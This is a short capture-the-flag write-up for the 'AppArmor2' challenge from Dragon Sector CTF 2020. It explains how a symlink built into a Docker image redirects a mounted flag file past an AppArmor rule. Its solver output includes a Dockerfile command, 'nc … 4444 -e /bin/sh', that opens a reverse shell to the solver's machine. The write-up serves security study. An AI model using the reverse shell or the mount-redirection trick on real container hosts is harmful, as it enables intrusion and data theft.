
Writeup for the AppArmor2 task from Dragon Sector CTF 2020

This is a very short writeup to the "AppArmor2" challenge from the Dragon Sector CTF 2020, solved by disconnect3d from justCatTheFish ctf team.

In this CTF challenge, there was a custom AppArmor policy applied to the run containers, such that it disallowed reads/writes to /flag-* paths.

We, as a user, could only provide a docker image that was built and run later on, and the flag (which we wanted to steal) was mounted as a volume into the run container with a docker run -v /flag.txt:/flag-XXYY ... invocation. The XXYY part was random.


The solver is in ./solve.sh. When running for first time, you need to:

  • update the (referenced) docker image name in build.sh and the <<YOURIP>> part
  • login to gitlab docker registry (docker login) and share your project with dragonsectorclient (that's how you shared the docker image with the challenge, and the challenge pulled and run it later on)

The bug here is that AppArmor denies read/write/etc to /flag-* but this limitation is enforced during container run time but not during its build time AND that Docker will follow symlinks present in the image when mounting files with docker run -v /hostpath:/containerpath ....

So it turns out that when the docker run -v something:somepath ... is invoked, the somepath follows links and we can make a link from /flag-XXYY to /D in our image. In the end, the docker run -v /flag.txt:/flag-XXYY ... will mount flag.txt into /D which we can read.

dc@jhtc:~/dsctf/x/task/ds-apparmor-task/solution$ ./solve.sh
mkdir: cannot create directory ‘rootfs’: File exists
Sending build context to Docker daemon  33.56MB
Step 1/4 : FROM ubuntu
 ---> d70eaf7277ea
Step 2/4 : RUN apt update && apt install -y netcat-traditional
 ---> Using cache
 ---> 40ac85e97bbe
Step 3/4 : ADD rootfs /
 ---> Using cache
 ---> 17f203a1ee6a
Step 4/4 : CMD nc 4444 -e /bin/sh
 ---> Using cache
 ---> 422aece7a145
Successfully built 422aece7a145
Successfully tagged registry.gitlab.com/mytempaccount123/test:latest
The push refers to repository [registry.gitlab.com/mytempaccount123/test]
3c45abc528a8: Layer already exists
be0923227e77: Layer already exists
cc9d18e90faa: Layer already exists
0c2689e3f920: Layer already exists
47dde53750b4: Layer already exists
latest: digest: sha256:fda92fc789dbfde33799502d18e30e8f3b2d184d9942ea1e6c5ff75f7003ffd5 size: 1365
[+] Opening connection to apparmor2.hackable.software on port 1337: Done
Executing b'hashcash -mb26 udqynihh'
out b'1:26:201121:udqynihh::i6HwB+Gk4OttOKvq:000000005+DgO\n'
b'Image added to the queue\n'
Listening on [] (family 0, port 4444)
Connection from 56178 received!
Original writeup (https://github.com/disconnect3d/writeups/tree/master/dsctf2020-apparmor2-task).